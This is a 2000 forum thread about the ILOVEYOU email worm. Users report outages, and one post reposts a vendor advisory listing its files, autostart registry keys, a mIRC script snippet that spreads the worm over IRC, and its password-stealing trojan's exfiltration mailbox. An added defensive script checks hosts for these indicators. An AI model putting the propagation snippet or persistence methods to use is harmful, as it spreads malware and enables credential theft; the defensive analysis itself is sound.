
Aaarrgghhh Virus!


  • Aaarrgghhh Virus!

    Well, here at work, we're one of the 1 in 10 UK businesses to be hit by this 'love letter' virus.

    Casualties:
    Email server.....dead.
    numerous development servers......dead.
    two test servers......dead
    one live server.....dead

    Oops!

    Oh, and I've just found out my university's email's dead too! Whoopee!

    ------------------
    Cheers,
    Steve

    "Life is what we make of it, yet most of us just fake"

  • #2
    Cool...

    could you pass it this way
    The Welsh support two teams when it comes to rugby. Wales of course, and anyone else playing England

    Comment


    • #3
      It's an email virus - if you get an email entitled 'ILOVEYOU', DO NOT open the .vbs attachment (a vbscript file). This will email everyone in your contacts list. In my company, we have had 40 people open it - at least 768 people in each person's address book. That hurts!

      ------------------
      Cheers,
      Steve

      "Life is what we make of it, yet most of us just fake"

      Comment


      • #4
        Ah, just heard that in fact it also renames many many different file types' extensions to what it feels like - that's how it kills PCs. Also, it embeds itself into your registry and re-runs itself if you manage to actually keep your machine going for long enough to do a reboot.

        ------------------
        Cheers,
        Steve

        "Life is what we make of it, yet most of us just fake"

        Comment


        • #5
          Yup, I was greeted with the following message first thing this morning at work.

          A new virus, LoveLetter.A, began infecting Microsoft Outlook users' systems this morning. As far as Computer Security is aware, no SNL users have experienced the problem.
          But opening any message with an "ILOVEYOU" subject line (the message text is "kindly check the attached LOVELETTER coming from me") and then opening the attachment means your computer system will become infected -- the virus will email itself out as an attachment with the above subject line and attachment name to everyone in your Personal Address List. And THAT means overwhelming traffic in our email system.

          The bottom line: Even if you're an incurable romantic, DON'T open any message with a LoveLetter subject line! Instead, delete it immediately.

          Norton's anti-virus staffers are developing some kind of fix at the moment, but at this point our existing anti-virus systems will not prevent us from becoming infected.

          Paul
          "Never interfere with the enemy when he is in the process of destroying himself"

          Comment


          • #6
            Yup, same thing here.
            It scales up with government though.
            2000 users with at least 2000 address book entries apiece.
            Needless to say, our email server is down
            chuck


            [This message has been edited by cjolley (edited 04 May 2000).]
            Chuck
            秋音的爸爸

            Comment


            • #7
              We got hit with it too..I had 106 of them in my inbox this morning. I was fortunate enough to be smart enough not to open it. Our email is still up but reeeaaalllyyy slow!!
              Flux capacitor overclocked to 1.31 jigawatts

              Comment


              • #8
                Our admins caught it before it became a problem. No troubles here in the mid-west with it.

                Although I have received about 15 messages warning me about the virus...

                Jammrock

                ------------------
                Athlon 650, Biostar board, 128 MB PC133 (Crucial), G400 32 MB DH, SB Live! w/ Digital I/O, 10/100 NIC, lots of case fans, etc...
                “Inside every sane person there’s a madman struggling to get out”
                –The Light Fantastic, Terry Pratchett

                Comment


                • #9
                  Lloyds of London I just heard has fallen....

                  I wonder if the author wanted this to happen? If so, I hope he gets at least 25 years for it!

                  ----
                  Virus Name: VBS/LoveLetter.worm

                  Aliases: none known



                  Characteristics:



                  This worm is a VBS program that is sent attached to an email with the subject ILOVEYOU.

                  The mail contains the message "kindly check the attached LOVELETTER coming from me."



                  The attachment is called LOVE-LETTER-FOR-YOU.TXT.vbs



                  If the user runs the attachment the worm runs using the Windows Scripting Host program. This is not normally present on Windows 95 or Windows NT unless Internet Explorer 5 is installed.



                  When the worm is first run it drops copies of itself in the following places :-



                  C:\WINDOWS\SYSTEM\MSKERNEL32.VBS

                  C:\WINDOWS\WIN32DLL.VBS

                  C:\WINDOWS\SYSTEM\LOVE-LETTER-FOR-YOU.TXT.VBS



                  It also adds the registry keys :-



                  HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32=C:\WINDOWS\SYSTEM\MSKernel32.vbs

                  HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL=C:\WINDOWS\Win32DLL.vbs



                  in order to run the worm at system start-up.





                  The worm replaces the following files :-



                  *.JPG

                  *.JPEG

                  *.MP3

                  *.MP2



                  with copies of itself and it adds the extension .VBS to the original filename. So PICT.JPG would be replaced with PICT.JPG.VBS and this would contain the worm.



                  The worm also overwrites the following files :-



                  *.VBS

                  *.VBE

                  *.JS

                  *.JSE

                  *.CSS

                  *.WSH

                  *.SCT

                  *.HTA



                  with copies of itself and renames the files to *.VBS.



                  The worm creates a file LOVE-LETTER-FOR-YOU.HTM which contains the worm and this is then sent to the IRC channels if the mIRC client is installed. This is accomplished by the worm replacing the file SCRIPT.INI with the following script :-



                  [script]

                  n0=on 1:JOIN:#:{

                  n1= /if ( $nick == $me ) { halt }

                  n2= /.dcc send $nick C:\WINDOWS\SYSTEM\LOVE-LETTER-FOR-YOU.HTM

                  n3=}



                  After a short delay the worm uses Microsoft Outlook to send copies of itself to all entries in the address book.

                  The mails will be of the same format as the original mail.





                  This worm also has another trick up its sleeve in that it tries to download and install an executable file called WIN-BUGSFIX.EXE from the Internet. This exe file is a password stealing program that will email any cached passwords to the mail address MAILME@SUPER.NET.PH



                  In order to facilitate this download the worm sets the start-up page of Microsoft Internet Explorer to point to the web-page containing the password stealing trojan.



                  The email sent by this program is as follows :-





                  From: goat1@192.168.0.2
                  To: mailme@super.net.ph
                  Subject: Barok... email.passwords.sender.trojan
                  X-Mailer: Barok... email.passwords.sender.trojan---by: spyder
                  Host: goat1
                  Username: Goat1
                  IP Address: 192.168.0.2



                  RAS Passwords:...

                  <password information goes here>

                  ...

                  Cache Passwords:...

                  <password information goes here>

                  ...



                  goatserver.goatnet/goatserver.goatnet : GOATNET\goat1:



                  MAPI : MAPI







                  The password stealing trojan is also installed via the following registry key :-



                  HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX



                  to auto run at system start-up.



                  After it has been run the password stealing trojan copies itself to WINDOWS\SYSTEM\WinFAT32.EXE and replaces the registry key with



                  HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WinFAT32=WinFAT32.EXE







                  Date Discovered: Thursday May 4th 2000

                  DAT included: 4077

                  Risk: High
                  ----

                  ------------------
                  Cheers,
                  Steve

                  "Life is what we make of it, yet most of us just fake"

                  Comment
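
A host-triage sketch built from the indicators in the advisory quoted in post #9, added here as an example and not part of the original thread or of any vendor tool. It checks a file listing and Run/RunServices value names against the dropped copies, autostart entries and NAME.EXT.VBS replacements the advisory lists; the function names and the sample inventory are constructed for illustration.

```python
import ntpath

# Indicators copied from the advisory quoted in post #9 (compared case-insensitively).
DROPPED_SUFFIXES = (
    r"\windows\system\mskernel32.vbs",
    r"\windows\win32dll.vbs",
    r"\windows\system\love-letter-for-you.txt.vbs",
    r"\windows\system\love-letter-for-you.htm",
    r"\windows\system\winfat32.exe",
)
RUN_KEY_SUFFIXES = (r"\currentversion\run", r"\currentversion\runservices")
RUN_VALUE_NAMES = {"mskernel32", "win32dll", "win-bugsfix", "winfat32"}
REPLACED_EXTS = {".jpg", ".jpeg", ".mp3", ".mp2"}  # originals become NAME.EXT.VBS

def check_path(path):
    """Return an indicator label for a file path, or None if it matches nothing."""
    p = path.lower()
    if p.endswith(DROPPED_SUFFIXES):
        return "dropped-copy"
    stem, ext = ntpath.splitext(ntpath.basename(p))
    # PICT.JPG -> PICT.JPG.VBS: a .vbs file whose inner extension is a media type.
    if ext == ".vbs" and ntpath.splitext(stem)[1] in REPLACED_EXTS:
        return "replaced-media"
    # For the overwritten script types the advisory says only that they are renamed
    # to *.VBS, so no name rule is attempted here; those need a content check.
    return None

def check_run_value(key, name):
    """Return 'autostart' if a Run/RunServices value name is one the advisory lists."""
    k = key.lower().rstrip("\\")
    if k.endswith(RUN_KEY_SUFFIXES) and name.lower() in RUN_VALUE_NAMES:
        return "autostart"
    return None

def triage(paths, run_values):
    """Collect (label, item) findings from a file listing and (key, value-name) pairs."""
    hits = [(check_path(p), p) for p in paths]
    hits += [(check_run_value(k, n), k + "\\" + n) for k, n in run_values]
    return [(label, item) for label, item in hits if label]

# Constructed sample inventory (not from the thread).
HKLM_RUN = r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"
SAMPLE_PATHS = [r"C:\WINDOWS\SYSTEM\MSKernel32.vbs", r"C:\My Documents\PICT.JPG.VBS",
                r"D:\music\track01.mp3", r"C:\scripts\backup.vbs"]
SAMPLE_RUNS = [(HKLM_RUN, "MSKernel32"), (HKLM_RUN, "SystemTray"),
               (HKLM_RUN + "Services", "Win32DLL")]

if __name__ == "__main__":
    for label, item in triage(SAMPLE_PATHS, SAMPLE_RUNS):
        print(f"{label:15} {item}")
```
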


                  • #10
                    er... Our mail server just went down
                    The Welsh support two teams when it comes to rugby. Wales of course, and anyone else playing England

                    Comment


                    • #11
                      70% of companies and ISPs in The Netherlands have been hit by this virus.

                      I don't even dare to open Holly's emails saying she loves me j/k

                      Jord.
                      Jord™

                      Comment


                      • #12
                        I would bet my months wages that it will or has ended up here.

                        Off home!
                        The Welsh support two teams when it comes to rugby. Wales of course, and anyone else playing England

                        Comment


                        • #13
                          This is great !
                          Today, there are 67 persons in my society who love me, including the nice secretary from the first floor !

                          ------------------
                          Corwin the Brute

                          Corwin the Brute

                          Comment


                          • #14
                            Must be your eau de toilette Corwin (de



                            Jord.
                            Jord™

                            Comment


                            • #15
                              ROTFL !
                              Very nice, Jorden. I will give it a try.


                              ------------------
                              Corwin the Brute

                              Corwin the Brute

                              Comment
